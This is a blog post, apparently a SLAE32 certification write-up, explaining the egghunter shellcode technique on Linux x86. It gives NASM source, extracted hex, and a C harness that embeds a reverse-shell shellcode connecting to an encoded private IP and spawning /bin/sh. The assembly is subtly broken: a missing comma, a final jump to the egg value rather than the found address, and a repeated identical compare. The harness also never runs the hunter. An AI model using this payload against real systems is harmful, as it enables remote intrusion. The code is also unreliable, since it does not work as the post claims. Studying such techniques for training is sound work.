Egghunter for Linux x86

9 minute read

Introduction

Why we are studiyng shellcoding? Because we want to inject our shellcodes in order to gain access to the victim machine.
There are many ways to do it, the basic way is to use a bugged program to take control of his execution flow through the EIP register, using buffer overflow of the stack in the memory. Explain how a buffer overflow works is out of the scope of this article. we assume that you already know how it works. If you don’t, before proceed to read the entire post, we suggest you to check this precious resources to learn how a buffer overflow works:

Well, if you are here we can continue. What appens when you are controlling the EIP register or the SEH chain, you can fill the stack with junk chars but you noticed that you haven’t enough space to place your shellcode?
In this case the workflow is not linear and we have a problem of space. There are many ways to solve this problem, one of this is to use a “placeholder” placed in a non defined portion of memory, which signals that ours shellcode start soon after the “placeholder”. This technique is called Egghunter.
At first glance it seems a very simple approach to solve the problem but it hide some pitfalls.
We list a series of excellent sources from which to draw the bases to best apply this technique:

Starting from Skape pdf we can extract why using an egghunter and consequntely reading the entire memory searching this “placeholder” to find and execute our shellcode, could be a nightmare.

The fact that people tend to ignore when thinking about searching for a needlein a haystack is the potential harm that can be brought about by groping aroundfor a sharp, pointy object in a mass of uncertainty. It is in this spirit that theauthor hopes to bring about a certain sense of safety for those who sometimesfind it necessary to grope around haystacks in search of needles. In the contextof this paper, the haystack represents a process “Virtual Address Space(VAS)” and the needle represents an egg that has been planted at an indeterminate placeby a program. The danger of searching a process’ VAS for an egg lies in the factthat there tend to be large regions of unallocated memory that would inevitablybe encountered along the path when searching for an egg. Dereferencing thisunallocated memory leads to Bad Things, much like pricking a finger with aneedle leads to pain.

Since we are interested in Linux enviroment shellcode development, we can continue reading the pdf, jumping directly to the Linux implementation of this technique, reading what should be the requirements for a well developed egghunter:

As described in the overview, searching VAS is dangerous given all of the unallocated memory regions that might be encountered on the way. As such, the following requirements have been enumerated in order to define what denotes a complete, robust, and what will henceforth be referred to as, egg hunter

Requirements

Let’s lists this requirements:

  1. It must be robust
    This requirement is used to express the fact that the egg hunter must be capable of searching through memory regions that are invalid and would otherwise crash the application if they were to be dereferenced improperly. It must also be capable of searching for the egg anywhere in memory.
  2. It must be small
    Given the scope of this paper, size is a principal requirement for the egg hunters as they must be able to go where no other payload would be able to fit when used in conjunction with an exploit. The smaller the better.
  3. It should be fast
    In order to avoid sitting idly for minutes while the egg hunter does its task, the methods used to search VAS should be as quick as possible, without violating the first requirement or second requirements without proper justification.

Starting from this point, we can deeply inspect what could be the techniques to write a respectful requirments egghunter implementation. According to Skape text, abusing the syscalls seems to be a more elegant and less intrusive method to obtain what we want.

The first and most obvious approach would be to register a SIGSEGV handler to catch invalid memory address dereferences and prevent the program from crashing. The second technique that can be used involves abusing the system call interface provided by the operating system to validate process VMAs in kernel mode. This approach offers a fair bit of elegance in that there are a wide array of system calls to choose from that might better suit the need of the searcher, and, furthermore, is less intrusive to the program itself than would be installing a segmentation fault signal handler

So our choice fall in an “think out of the box” approach using a syscall. In fact the syscalls provides us all what we need to build an egghunter assembly code for our purposes.

When a system call encounters an invalid memory address, most will return the EFAULT error code to indicate that a pointer provided to the system call was not valid. Fortunately for the egg hunter, this is the exact type of information it needs in order to safely traverse the process’ VAS without dereferencing the invalid memory regions that are strewn about the process.

Analisys

So what we have do is to develop an Assembly script (egghunter) using a syscall that should do a search for every memory page of the system for our egg, if the script enter an invalid memory address an EFAULT error will be reported and we can skip to the next memory address, if the next is a valid memory address but nothing match with our egghunter we skip again in the next memory address and so on since we find the egghunter in memory and we can execute our shellcode. So what is an egg in pratically? It is a 4 bytes unique string repeated 2 times and stored somewhere in the memory, in total a 8 bytes word. Why repeated? Because we must save the pattern to search in one of the CPU register and we must avoid the case where the search encounter the pattern itself instead of the real egghunter stored in the buffer.

The smallest unit of memory in IA32 arch is the PAGESIZE, so every unit must be controlled, but what are the real dimensions of a PAGESIZE in our system? A script could help us. Wikipedia source

#include <stdio.h>
#include <unistd.h> /* sysconf(3) */

int main(void)
{
        printf("The page size for this system is %ld bytes.\n",
                sysconf(_SC_PAGESIZE)); /* _SC_PAGE_SIZE is OK too. */

        return 0;
}

We compile and execute it

root@slae32-lab:# ./pagesize 
The page size for this system is 4096 bytes.

According to the /usr/include/asm-generic/errno-base.h file, the EFAULT code is 14 (0x0e in hex)
Now, we want a syscall as simple as possible that return a EFAULT error, in our case consulting a list of syscalls we can see that chdir could be a valid candidate.

The hex value for chdir is 12 (0x0c in hex)
Let’s review the steps:

  1. build an egg of 8 bytes (4 bytes repeated) and store it in a register
  2. execute the syscall
  3. compare the return code with -14 (0xf2 in hex)
    if it is EFAULT (14), ZF is set then jump to the next memory PAGESIZE because it is a invalid memory address otherwise compare the value with the egg
  4. if the comparison doesn’t match step into the next address and repeat from point 2
  5. if ZF is set, comparison match, the egg is found and we can execute our shellcode.

The Code

Let’s write our code

; Filename: egghunter.nasm
; Author:  SLAE-1476
; twitter: @bolonobolo
; email: bolo@autistici.org / iambolo@protonmail.com

global _start

section .text
_start:

	; eax contains the syscall hex value
	; ebx contains the value of the address memory to compare
	; ecx contains the egg
	; edx contains the next address to compare

	xor ebx, ebx            ; reset EBX registers
	mul ebx                 ; reset EAX and EDX
	xor ecx, ecx            ; reset ECX
	mov ecx 0x50905090      ; load the egg in ecx

next_page:
	or dx, 0xfff            ; move to the next PAGESIZE forward of 4095 bytes (0xfff in hex)
                                ; can't use 4096 because the hex value is 0x1000 (NULL bytes)	
hunter:
	inc edx                 ; add 1 to 4095 = 4096 bytes
	lea ebx, [edx + 4]      ; move to the next address 
	mov al, 0x0c            ; load the chdir syscall
	int 0x80                ; call the syscall
	cmp al, 0xf2            ; compare the result of the syscall with EFAULT value 
	jz next_page            ; if the result is EFAULT move to the next PAGESIZE
	mov edi, edx            ; load value of edx in edi
	cmp [edi], ecx          ; compare the value of edi with egg
	jnz hunter              ; if not match, loop
	cmp [edi], ecx          ; compare the value of edi with egg again for the second value
	jnz hunter              ; if not match, loop
	jmp ecx                 ; egg found, jump to our shellcode

We compile the nasm file to obtain a binary and we can execute it

nasm -f elf32 -o bind_shell.o bind_shell.nasm
ld -o bind_shell bind_shell.o

Or can build a bash script to do everything in one shot, next we have to extract the hexadecimal values of the egghunter binary with an esotheric objdump command picked up from CommandLineFu.

objdump -d ./PROGRAM|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

and obtain the hex string

root@slae32-lab:# objdump -d ./egghunter|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\x31\xdb\xf7\xe3\x31\xc9\xb9\x90\x50\x90\x50\x66\x81\xca\xff\x0f\x42\x8d\x5a\x04\xb0\x0c\xcd\x80\x3c\xf2\x74\xef\x89\xd7\x39\x0f\x75\xee\x39\x0f\x75\xea\xff\xe1"

We can also see that the script seems NULL bytes free, good work! Now copy the egghunter, the egg and the shellcode in a C program that execute it.

#include<stdio.h>
#include<string.h>


unsigned char hunter[] = "\x31\xdb\xf7\xe3\x31\xc9\xb9\x90\x50\x90\x50\x66\x81\xca\xff\x0f\x42\x8d\x5a\x04\xb0\x0c\xcd\x80\x3c\xf2\x74\xef\x89\xd7\x39\x0f\x75\xee\x39\x0f\x75\xea\xff\xe1";

/*                      ________________________________    */
/*                     |      EGG       |      EGG      |   */
unsigned char code[] = "\x90\x50\x90\x50\x90\x50\x90\x50\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb1\x01\xb3\x02\x66\xb8\x67\x01\xcd\x80\x89\xc7\xb2\x16\x31\xc9\x51\xb9\xc1\xa9\x02\xe0\x81\xe9\x01\x01\x01\x01\x51\x66\x68\x04\xd2\x66\x6a\x02\x89\xe1\x89\xfb\x66\xb8\x6a\x01\xcd\x80\x31\xdb\x31\xc9\xb1\x03\x31\xc0\x89\xfb\xb0\x3f\xfe\xc9\xcd\x80\x75\xf4\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";

void main()
{
        printf("Egg hunter length: %d\n", strlen(hunter));
        printf("Shellcode Length:  %d\n", strlen(code));

        int (*ret)() = (int(*)())code;

        ret();

}

As you can see, first we must add the hunter hexadecimal code, next we must add the egg hex code 2 times before the reverse shellcode developed in the previous post, now let’s see if it works


Egg hunter length: 40
Shellcode Length:  105

Nice job!

All the codes used in this post are available in my dedicated github repo.

This blog post has been created for completing the requirements
of the SecurityTube Linux Assembly Expert certification: SLAE32 Course
Student ID: SLAE-1476